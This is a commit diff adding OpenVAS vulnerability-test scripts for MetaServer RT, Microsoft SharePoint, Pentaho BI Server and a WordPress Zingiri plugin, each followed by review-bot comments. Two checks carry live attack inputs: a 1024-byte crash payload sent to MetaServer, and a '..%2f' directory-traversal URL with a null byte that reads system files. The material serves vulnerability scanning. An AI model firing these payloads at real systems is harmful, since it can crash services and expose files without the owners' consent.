+  http://aluigi.altervista.org/adv/metaserver_1-adv.txt ";
+
+  script_description(desc);
+  script_summary("Determine if MetaServer RT is prone to denial of service vulnerability");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Denial of Service");
+  script_dependencies("find_service.nes");
+  script_require_ports(2194);
+  exit(0);
+}
+
+
+## Get Default Port
+port = 2194;
+if(!get_port_state(port)){
+ exit(0);
+}
+
+## Open the socket
+soc = open_sock_tcp(port);
+if(!soc){
+  exit(0);
+}
+
+## Construct Attack Request
+req =  crap(data: raw_string(0x80), length:1024);
+
+## Sending Attack
+send(socket:soc, data:req);
+close(soc);
+
+## Waiting
+sleep(3);
+
+## Open the socket and Check server is dead or alive
+soc = open_sock_tcp(port);
+if(!soc)
+{
+  security_hole(port);
+  exit(0);
+}
+
+close(soc);

Added: trunk/openvas-plugins/scripts/secpod_ms10-072.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ms10-072.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/secpod_ms10-072.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,151 @@
+########i#######################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_ms10-072.nasl 11488 2011-09-22 10:40:09Z sep $
+#
+# Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902626);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2010-3243", "CVE-2010-3324");
+  script_bugtraq_id(42467, 43703);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048)");
+  desc = "
+  Overview: This host has important security update missing according to
+  Microsoft Bulletin MS10-072.
+
+  Vulnerability Insight:
+  Multiple flaws are due to the way SafeHTML function sanitizes HTML content.
+
+  Impact:
+  Successful exploitation could allow remote attackers to gain sensitie
+  information via a specially crafted script using SafeHTML.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Microsoft Office SharePoint Server 2007 Service Pack 2
+  Microsoft Windows SharePoint Services 3.0 Service Pack 2
+
+  Fix:
+  Run Windows Update and update the listed hotfixes or download and
+  update mentioned hotfixes in the advisory from the below link,
+  http://technet.microsoft.com/en-us/security/bulletin/MS10-072
+
+  References:
+  http://support.microsoft.com/kb/2412048
+  http://technet.microsoft.com/en-us/security/bulletin/MS10-072 ";
+
+  script_description(desc);
+  script_summary("Check for the vulnerable file version");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2010 SecPod");
+  script_family("Windows : Microsoft Bulletins");
+  script_dependencies("secpod_reg_enum.nasl");
+  script_require_ports(139, 445);
+  exit(0);
+}
+
+
+include("smb_nt.inc");
+include("secpod_reg.inc");
+include("version_func.inc");
+include("secpod_smb_func.inc");
+
+
+## MS10-072 Hotfix
+if(hotfix_missing(name:"2345304") == 1)
+{
+  ## Microsoft SharePoint Server 2007
+  key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\";
+
+  if(registry_key_exists(key:key))
+  {
+    foreach item (registry_enum_keys(key:key))
+    {
+      appName = registry_get_sz(item:"DisplayName", key:key + item);
+      if("Microsoft Office SharePoint Server 2007" >< appName)
+      {
+        dllPath =  registry_get_sz(item:"BinPath",
+                              key:"SOFTWARE\Microsoft\Office Server\12.0");
+
+        if(dllPath)
+        {
+          dllPath = dllPath + "web server extensions\12\ISAPI";
+          vers  = fetch_file_version(sysPath:dllPath,
+                                   file_name:"Microsoft.office.server.dll");
+          if(vers)
+          {
+            ## Check for Microsoft.sharepoint.publishing.dl version < 12.0.6539.5000
+            if(version_is_less(version:vers, test_version:"12.0.6539.5000"))
+            {
+              security_hole(0);
+              exit(0);
+            }
+          }
+        }
+      }
+    }
+  }
+}
+
+## Hotfix check
+if(hotfix_missing(name:"2345212") == 0){
+  exit(0);
+}
+
+## Microsoft Windows SharePoint Services
+if(!registry_key_exists(key:key)){
+  exit(0);
+}
+
+foreach item (registry_enum_keys(key:key))
+{
+  srvcName = registry_get_sz(item:"DisplayName", key:key + item);
+  if("Microsoft Windows SharePoint Services" >< srvcName)
+  {
+    dllPath =  registry_get_sz(item:"SharedFilesDir",
+               key:"SOFTWARE\Microsoft\Shared Tools");
+
+    if(!dllPath){
+      exit(0);
+    }
+
+    dllPath = dllPath + "web server extensions\12\BIN";
+    dllVer  = fetch_file_version(sysPath:dllPath, file_name:"Onetutil.dll");
+
+    if(!dllVer){
+      exit(0);
+    }
+
+    ## Check for onetutil.dll version < 12.0.6545.5002 for Sharepoint services 3.0
+    if(version_is_less(version:dllVer, test_version:"12.0.6545.5002"))
+    {
+      security_hole(0);
+      exit(0);
+    }
+  }
+}
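Review bot: The Windows SharePoint Services branch never runs when hotfix 2345304 is installed, because `key` is assigned only inside the `hotfix_missing(name:"2345304") == 1` block, so the later `if(!registry_key_exists(key:key))` guard is evaluated with an unset key and presumably exits before Onetutil.dll is ever checked. Move the assignment above the first hotfix check so both paths share it: `key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\";` placed immediately before `if(hotfix_missing(name:"2345304") == 1)`. The comment above the first version comparison names Microsoft.sharepoint.publishing.dll while the version actually fetched is Microsoft.office.server.dll; align it, e.g. `## Check for Microsoft.office.server.dll version < 12.0.6539.5000`. The copyright line says 2010 while the header and the rest of this commit say 2011.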

Added: trunk/openvas-plugins/scripts/secpod_pentaho_bi_server_mult_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_pentaho_bi_server_mult_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/secpod_pentaho_bi_server_mult_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,100 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_pentaho_bi_server_mult_vuln.nasl 17105 2011-09-21 11:11:11Z sep $
+#
+# Pentaho BI Server Multiple Vulnerabilities
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902568);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2009-5099", "CVE-2009-5100", "CVE-2009-5101");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Pentaho BI Server Multiple Vulnerabilities");
+  desc = "
+  Overview: The host is running Pentaho BI Server and is prone to multiple
+  vulnerabilities.
+
+  Vulnerability Insight:
+  - Input passed via the 'outputType' parameter to ViewAction is not properly
+    sanitised before being returned to the user. This can be exploited to
+    execute arbitrary HTML and script code in a user's browser session in
+    context of an affected site.
+  - Password field with autocomplete enabled, which might allow physically
+    proximate attackers to obtain the password.
+  - Disclosure of session ID (JSESSIONID) in URL, which allows attackers to
+    obtain it from session history, referer headers, or sniffing of web traffic.
+
+  Impact:
+  Successful exploitation will let the attacker to execute arbitrary script
+  code in the browser of an unsuspecting user in the context of the affected
+  site or obtain sensitive information.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Pentaho BI Server version 1.7.0.1062 and prior.
+
+  Fix: Upgrade to Pentaho BI Server 3.5.0 GA or later,
+  For updates refer, http://www.pentaho.com/download/
+
+  References:
+  http://secunia.com/advisories/37024
+  http://www.securityfocus.com/archive/1/archive/1/507168/100/0/threaded
+  http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/
+  http://jira.pentaho.com/browse/BISERVER-2698?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ";
+
+  script_description(desc);
+  script_summary("Check for the Password field with autocomplete enabled in Pentaho BI Server");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web Servers");
+  script_require_ports("Services/www", 8080);
+  exit(0);
+}
+
+
+include("http_func.inc");
+
+## Get HTTP Port
+port = get_http_port(default:8080);
+if(!port){
+  exit(0);
+}
+
+## Send and Receive the response
+req = http_get(item:string("/pentaho/Login"),  port:port);
+res = http_send_recv(port:port, data:req);
+
+## Confirm the application
+if("Pentaho BI Platform" >< res)
+{
+  ## Check for the Password field with autocomplete enabled
+  if('<td colspan="2"><input type=\'password\' name=\'j_password\' '+
+                                          'size="30" ></td>' >< res)
+  {
+    security_warning(port);
+    exit(0);
+  }
+}
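Review bot: The check matches one exact HTML fragment (attribute order, quote style and spacing included), so any cosmetic change to the login template yields a silent false negative, and it never actually verifies that `autocomplete` is absent from the field, which is the condition the summary claims to test. Extracting the password input tag and testing it for the attribute is more robust: `tag = egrep(pattern:"<input[^>]*name=.j_password.[^>]*>", string:res);` followed by `if(tag && !("autocomplete" >< tolower(tag))) { security_warning(port); exit(0); }`. The script reports three CVEs (XSS, autocomplete, session ID in URL) but only the autocomplete issue is exercised; a comment such as `## Only the autocomplete issue is tested; XSS and JSESSIONID disclosure are reported by association` would make that explicit for anyone triaging the result.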

Added: trunk/openvas-plugins/scripts/secpod_wordpress_zingiri_web_shop_rfi_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_wordpress_zingiri_web_shop_rfi_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/secpod_wordpress_zingiri_web_shop_rfi_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,113 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_wordpress_zingiri_web_shop_rfi_vuln.nasl 17226 2011-09-21 13:16:16Z sep $
+#
+# WordPress Zingiri Web Shop Plugin Remote File Inclusion Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902729);
+  script_version("$Revision: 1.0$");
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("WordPress Zingiri Web Shop Plugin Remote File Inclusion Vulnerability");
+  desc = "
+  Overview:
+  This host is installed with WordPress Zingiri Web Shop Plugin and is prone to
+  remote file inclusion vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to improper validation of user-supplied input passed
+  via 'wpabspath' parameter to /wp-content/plugins/zingiri-web-shop/fws/ajax/
+  init.inc.php, which allows attackers to read arbitrary files via a
+  ../(dot dot) sequences.
+
+  Impact:
+  Successful exploitation could allow attackers to perform directory traversal
+  attacks and read arbitrary files on the affected application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  WordPress Zingiri Web Shop Plugin Version 2.2.0
+
+  Fix: No solution or patch is available as on 21th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://wordpress.org/extend/plugins/zingiri-web-shop/download/
+
+  References:
+  http://packetstormsecurity.org/files/view/105237/wpzingiri-rfi.txt ";
+
+  script_description(desc);
+  script_summary("Check RFI vulnerability in WordPress Zingiri Web Shop Plugin");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_dependencies("secpod_wordpress_detect_900182.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+##
+## The script code starts here
+##
+
+include("http_func.inc");
+include("host_details.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+## Get WordPress Installed Location
+if(!dir = get_dir_from_kb(port:port, app:"WordPress")){
+  exit(0);
+}
+
+## traversal_files() function Returns Dictionary (i.e key value pair)
+## Get Content to be checked and file to be check
+files = traversal_files();
+
+foreach file (keys(files))
+{
+  ## Construct directory traversal attack
+  url = string(dir, "/wp-content/plugins/zingiri-web-shop/fws/ajax/" +
+                    "init.inc.php?wpabspath=", crap(data:"..%2f",length:3*15),
+                    files[file],"%00");
+
+  ## Confirm exploit worked properly or not
+  if(http_vuln_check(port:port, url:url,pattern:file))
+  {
+    security_hole(port:port);
+    exit(0);
+  }
+}
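Review bot: The test sends a `..%2f` traversal sequence with a local file name and matches its content, which is a directory traversal / local file read check, consistent with the Vulnerability Insight and Impact text, while `script_name`, `script_summary` and the ChangeLog entry call it Remote File Inclusion; the title and summary should say what the script actually verifies, e.g. `script_summary("Check directory traversal vulnerability in WordPress Zingiri Web Shop Plugin");`. `version_func.inc` is included but no version function is used in the visible body, and `host_details.inc` appears unused as well; if `get_dir_from_kb` does not come from one of them, both includes can be dropped. The fix text in the description reads "21th September"; the sibling MetaServer script in this commit uses "21st".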


